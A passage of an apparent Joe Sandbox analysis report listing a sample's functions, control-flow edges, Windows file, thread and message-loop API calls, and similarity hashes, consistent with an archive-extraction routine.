                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,9CAA5719,?,?,00000000,?,?,00000000,00CC9E6B,000000FF), ref: 00C9E248
                                              • GetLastError.KERNEL32(?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00C9E25A
                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00CC9E6B,000000FF,?,00000011), ref: 00C9E2A6
                                              • GetLastError.KERNEL32(?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00C9E2AF
                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00C9E346
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$CreateErrorLast$Time
                                              • String ID:
                                              • API String ID: 1999340476-0
                                              • Opcode ID: ddf92e1cb076435076c300b55c5a4200087165c2225945fc5abaf74c7cef4637
                                              • Instruction ID: f364d86b8a9ebdedfb5ea9b86696404a1f355c8ad40ab011ba8e97c56f38ca63
                                              • Opcode Fuzzy Hash: ddf92e1cb076435076c300b55c5a4200087165c2225945fc5abaf74c7cef4637
                                              • Instruction Fuzzy Hash: B061AE70900649EFDF24CFA4C889BEE7BB4FF18314F20062AF82597291D774AA44CB94

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00CA74EC: basic-block and edge listing omitted; the API calls it contains are listed below]
                                              APIs
                                                • Part of subcall function 00CA77CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00C973B8), ref: 00CA77E1
                                                • Part of subcall function 00CA77CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00C973B8), ref: 00CA77F5
                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,9CAA5719,?,?,00000001,00000000,00CCA603,000000FF,?,00CA90B9,?,?,00C95630,?), ref: 00CA752A
                                              • CloseHandle.KERNELBASE(?,?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?), ref: 00CA7544
                                              • DeleteCriticalSection.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA755D
                                              • CloseHandle.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA7569
                                              • CloseHandle.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA7575
                                                • Part of subcall function 00CA75ED: WaitForSingleObject.KERNEL32(?,000000FF,00CA770A,?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75F3
                                                • Part of subcall function 00CA75ED: GetLastError.KERNEL32(?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                              • String ID:
                                              • API String ID: 1868215902-0
                                              • Opcode ID: 57085ae4eaefd0a7b3bd0a63c1e5863404e54f3aca53e38eaeb5c633d72380c2
                                              • Instruction ID: 698705aa25d57b1a421ed9b4db81fb42a10ae01a5ea4558fb973f742d136e5a0
                                              • Opcode Fuzzy Hash: 57085ae4eaefd0a7b3bd0a63c1e5863404e54f3aca53e38eaeb5c633d72380c2
                                              • Instruction Fuzzy Hash: AF118472504705EFC7229F64DDC4FCAFBA9FB08754F00492AF16B92160CB71A941CB54

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00CB0678: basic-block and edge listing omitted; the API calls it contains are listed below]
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                              • IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                              • TranslateMessage.USER32(?), ref: 00CB06BC
                                              • DispatchMessageW.USER32(?), ref: 00CB06C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 1266772231-0
                                              • Opcode ID: 5a497302951a8b1cbca3e11002a057f234e9fa703ebb640a34d919922cb0017f
                                              • Instruction ID: 195584218c4f2582487f4afe53af54d55f560888869fcf9a8b459e03a1e83164
                                              • Opcode Fuzzy Hash: 5a497302951a8b1cbca3e11002a057f234e9fa703ebb640a34d919922cb0017f
                                              • Instruction Fuzzy Hash: 42F030B190625AAB8F20ABE2EC8CFDF7FACEE452A07004510F916D2050E724D605CBB0

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00CB2813: basic-block and edge listing omitted; this function calls no imported API directly (see the API ID below)]
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: HIDE$MAX$MIN
                                              • API String ID: 176396367-2426493550
                                              • Opcode ID: 353f2de6ecbfa879d39ec6bb723479e7c68e2fe27b49d92e828edf9c69a03359
                                              • Instruction ID: 4ee175ca5471d51ec8bf79fb2efb3c4b2483e0d6d33d13ec5c85bc9afea13598
                                              • Opcode Fuzzy Hash: 353f2de6ecbfa879d39ec6bb723479e7c68e2fe27b49d92e828edf9c69a03359
                                              • Instruction Fuzzy Hash: BD917D72C00269DECF24DBA4CC85ADDB7B8BF49310F14059AE805B7281DB359F86EB90

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00CA6C5E: __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                                • Part of subcall function 00CA6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • OleInitialize.OLE32(00000000), ref: 00CAF4ED
                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CAF524
                                              • SHGetMalloc.SHELL32(00CE532C), ref: 00CAF52E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                              • String ID: riched20.dll
                                              • API String ID: 2446841611-3360196438
                                              • Opcode ID: d08afd0727390ffc7f7fa10e8bca5cb0bf40542fd2048831f57a57fef2061917
                                              • Instruction ID: bd0f6c12d24520dcd628076d4165b37be403ba18f95bf2c1c4eb8c457a3aeb28
                                              • Opcode Fuzzy Hash: d08afd0727390ffc7f7fa10e8bca5cb0bf40542fd2048831f57a57fef2061917
                                              • Instruction Fuzzy Hash: FCF01DB5D00249ABCB10AF99DC49AEFFFFCEF94704F00416AF415E2250D7B856058BA1

                                              Control-flow Graph

                                              control_flow_graph 1217 c9e948-c9e961 call cb57d8 1220 c9e96a-c9e974 1217->1220 1221 c9e963-c9e965 1217->1221 1223 c9e988 1220->1223 1224 c9e976-c9e983 GetStdHandle 1220->1224 1222 c9eaa6-c9eaab call cb5787 1221->1222 1226 c9e98b-c9e998 1223->1226 1225 c9ea6f-c9ea72 1224->1225 1225->1226 1228 c9e99a-c9e99e 1226->1228 1229 c9e9df-c9e9f4 WriteFile 1226->1229 1232 c9e9ff-c9ea03 1228->1232 1233 c9e9a0-c9e9ab 1228->1233 1231 c9e9f7-c9e9f9 1229->1231 1231->1232 1234 c9ea9f-c9eaa2 1231->1234 1232->1234 1235 c9ea09-c9ea0d 1232->1235 1236 c9e9ad 1233->1236 1237 c9e9af-c9e9ce WriteFile 1233->1237 1234->1222 1235->1234 1239 c9ea13-c9ea25 call c99230 1235->1239 1236->1237 1237->1231 1238 c9e9d0-c9e9db 1237->1238 1238->1233 1240 c9e9dd 1238->1240 1243 c9ea77-c9ea9a call c914a7 call c99653 call c91a66 1239->1243 1244 c9ea27-c9ea30 1239->1244 1240->1231 1243->1234 1244->1226 1246 c9ea36-c9ea3a 1244->1246 1246->1226 1248 c9ea40-c9ea6c 1246->1248 1248->1225
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9E94F
                                              • GetStdHandle.KERNEL32(000000F5,0000002C,00CA2D28,?,?,?,?,00000000,00CAABB6,?,?,?,?,?,00CAA80E,?), ref: 00C9E978
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C9E9BE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileH_prolog3_HandleWrite
                                              • String ID:
                                              • API String ID: 2898186245-0
                                              • Opcode ID: 919640b9399492003c921a9168f28247f833fa3df52fa1e7ccfe1b4978832d66
                                              • Instruction ID: 06100e6a037c3076cfaca69dea36fa41a6caf7f87ef0d7b6f4c063ffdb2c2a4e
                                              • Opcode Fuzzy Hash: 919640b9399492003c921a9168f28247f833fa3df52fa1e7ccfe1b4978832d66
                                              • Instruction Fuzzy Hash: 7D419A35A01218AFDF14DFA4D888BEDBB76BFA4700F044158F801AB290CB759E44DBA1

                                              Control-flow Graph

                                              control_flow_graph 1256 c9efef-c9f00a call cb57d8 call ca13da 1261 c9f00c-c9f00f 1256->1261 1262 c9f031-c9f033 1256->1262 1261->1262 1264 c9f011-c9f017 1261->1264 1263 c9f035-c9f03d call c9ed0d 1262->1263 1273 c9f0e3-c9f0f0 GetLastError 1263->1273 1274 c9f043-c9f065 call ca169a 1263->1274 1265 c9f019 1264->1265 1266 c9f01b-c9f029 CreateDirectoryW 1264->1266 1265->1266 1268 c9f02f 1266->1268 1269 c9f0d0-c9f0d4 1266->1269 1268->1263 1271 c9f0df-c9f0e1 1269->1271 1272 c9f0d6-c9f0da call c9f58b 1269->1272 1277 c9f0fb-c9f100 call cb5787 1271->1277 1272->1271 1273->1277 1278 c9f0f2-c9f0fa 1273->1278 1281 c9f07d-c9f087 1274->1281 1282 c9f067-c9f06e 1274->1282 1278->1277 1286 c9f089-c9f09e 1281->1286 1287 c9f0bc-c9f0ce 1281->1287 1284 c9f070 1282->1284 1285 c9f073-c9f07b CreateDirectoryW 1282->1285 1284->1285 1285->1281 1288 c9f0a0-c9f0b0 call c919a9 1286->1288 1289 c9f0b3-c9f0bb call cb5726 1286->1289 1287->1269 1287->1273 1288->1289 1289->1287
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9EFF6
                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?,00000001,?,?), ref: 00C9F01F
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?), ref: 00C9F075
                                              • GetLastError.KERNEL32(?,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?,00000001,?,?,00000000), ref: 00C9F0E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                              • String ID:
                                              • API String ID: 3709856315-0
                                              • Opcode ID: cdec87752c94873f332a70adbb7682c529a21fcea2a2d9ee25914f51335ad269
                                              • Instruction ID: 5f157c0b7fcd1ab14d1af65c50a3584caf5dc97a959ee8ea8838779b4e7736e8
                                              • Opcode Fuzzy Hash: cdec87752c94873f332a70adbb7682c529a21fcea2a2d9ee25914f51335ad269
                                              • Instruction Fuzzy Hash: 3B317E71910209DBDF10DFA9C98CAEEBBB8AF48304F14542EE511E3252CB749A86CB65

                                              Control-flow Graph

                                              control_flow_graph 1294 c9e019-c9e025 1295 c9e032-c9e049 ReadFile 1294->1295 1296 c9e027-c9e02f GetStdHandle 1294->1296 1297 c9e04b-c9e054 call c9e152 1295->1297 1298 c9e0a5 1295->1298 1296->1295 1302 c9e06d-c9e071 1297->1302 1303 c9e056-c9e05e 1297->1303 1300 c9e0a8-c9e0ab 1298->1300 1304 c9e073-c9e07c GetLastError 1302->1304 1305 c9e082-c9e086 1302->1305 1303->1302 1306 c9e060 1303->1306 1304->1305 1307 c9e07e-c9e080 1304->1307 1308 c9e088-c9e090 1305->1308 1309 c9e0a0-c9e0a3 1305->1309 1310 c9e061-c9e06b call c9e019 1306->1310 1307->1300 1308->1309 1311 c9e092-c9e09b GetLastError 1308->1311 1309->1300 1310->1300 1311->1309 1313 c9e09d-c9e09e 1311->1313 1313->1310
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E029
                                              • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E041
                                              • GetLastError.KERNEL32(?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E073
                                              • GetLastError.KERNEL32(?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E092
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: 1cbbc413817302e3a51beecd90f6f5d9cd26353684a05b70aaad37d5d92764a8
                                              • Instruction ID: 7d2ce537a79d0e80eed3042d0490449e76d8bc2104ca79e58ef9928685b887a5
                                              • Opcode Fuzzy Hash: 1cbbc413817302e3a51beecd90f6f5d9cd26353684a05b70aaad37d5d92764a8
                                              • Instruction Fuzzy Hash: 8E117C30500218EBDF20DB61C84CB6E37A9BB65361F50562AE42A85190DBB5DE44BB61
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00CA764C
                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00C9736D,00C95AB0,?), ref: 00CA7693
                                                • Part of subcall function 00C992EB: __EH_prolog3_GS.LIBCMT ref: 00C992F2
                                                • Part of subcall function 00C99500: __EH_prolog3_GS.LIBCMT ref: 00C99507
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_Thread$CreatePriority
                                              • String ID: CreateThread failed
                                              • API String ID: 3138599208-3849766595
                                              • Opcode ID: c9ef1a002d3ceab31042de6413ceb23a8e4ca0c5ef060c81af4226466d8663b3
                                              • Instruction ID: 6f89bd4195549ebdd1f8e8b812bfd1233fbaf39d215cd5350d2aa47f0f66d15c
                                              • Opcode Fuzzy Hash: c9ef1a002d3ceab31042de6413ceb23a8e4ca0c5ef060c81af4226466d8663b3
                                              • Instruction Fuzzy Hash: B401D6B5348B066BE7107FA8DC85FA67358FB41715F20063EF6469A180CAF17801D738
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9DEA1
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00C9E8F5,?,?,00C9A6B9,?,00000011,?), ref: 00C9DF15
                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00C9D303,?,?,?), ref: 00C9DF65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CreateFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 1771569470-0
                                              • Opcode ID: 05bbc3f007bd5629a0f4a07d4641a7bf6650c3fdc4b7efa3918e86071a6b95d7
                                              • Instruction ID: a18b340fa9a69806f3bfe01ca4cfd8473f0459e118ef5b6bc3843465b6bdf2eb
                                              • Opcode Fuzzy Hash: 05bbc3f007bd5629a0f4a07d4641a7bf6650c3fdc4b7efa3918e86071a6b95d7
                                              • Instruction Fuzzy Hash: 8F417CB0910208DFDF14DFA8D88ABEEB7F4EB08324F14461EE466F7281D774A9448B24
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00CA6D0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                              • String ID:
                                              • API String ID: 1552931673-0
                                              • Opcode ID: 0eb17cf0712b0c8ee8c156a499ea684c43e23a491e3ead32a538d0bf72ec4a00
                                              • Instruction ID: ccecce7f042418560c236764d546d4237d7c727fd169c8cc5f1364c043a80be9
                                              • Opcode Fuzzy Hash: 0eb17cf0712b0c8ee8c156a499ea684c43e23a491e3ead32a538d0bf72ec4a00
                                              • Instruction Fuzzy Hash: 27318D71E10209DFCF04EBE4C88ABEEBBB8AF49318F18011EE505B7281DB745A45DB61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F592
                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,00C9A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00C9F5A8
                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F5EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AttributesFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 2559025557-0
                                              • Opcode ID: 6dac49d8efae11be23859a1b182cb6006221306b1991c3bb967018c7c1264f06
                                              • Instruction ID: b4ed90abfc94c27d66be89fbfbe7cbf7b83e787525e6f0c21663f840be6f33f0
                                              • Opcode Fuzzy Hash: 6dac49d8efae11be23859a1b182cb6006221306b1991c3bb967018c7c1264f06
                                              • Instruction Fuzzy Hash: 8711E471910219EBDF04DFA8D889ADEB7B8BF08314F14402AF804E7250DB34DA56DB64
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9EC6A
                                              • DeleteFileW.KERNELBASE(?,00000024,00C9D6F7,?), ref: 00C9EC7D
                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00C9ECBD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DeleteFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 3558260747-0
                                              • Opcode ID: 544cc3ed931c9a397be6cc428cefa9acb1a9a18da48000dafe831f6210eda481
                                              • Instruction ID: d9277400c921a9de611cfe467b4ce0f16ffed140aa490e12c579098dbeeacdb4
                                              • Opcode Fuzzy Hash: 544cc3ed931c9a397be6cc428cefa9acb1a9a18da48000dafe831f6210eda481
                                              • Instruction Fuzzy Hash: CF110471E10219DBDF04DFA8D889EDEB7B8AF08311F18042AE844F7250DB34AA85DB64
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9ED26
                                              • GetFileAttributesW.KERNELBASE(?,00000024,00C9ED16,00000000,00C9A4A1,9CAA5719,?,00C9CDDD,?,?,?,?,?,?,?,?), ref: 00C9ED39
                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00C9ED79
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AttributesFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 2559025557-0
                                              • Opcode ID: 1b3f78a5eaa59a8dd2e24e00f6b60b1a4188e2bf9e281394034ea90a18645ced
                                              • Instruction ID: 344967e3b278852c8acac3ce1d553bc2259081e56c0c27d1ef2c43fb429689d4
                                              • Opcode Fuzzy Hash: 1b3f78a5eaa59a8dd2e24e00f6b60b1a4188e2bf9e281394034ea90a18645ced
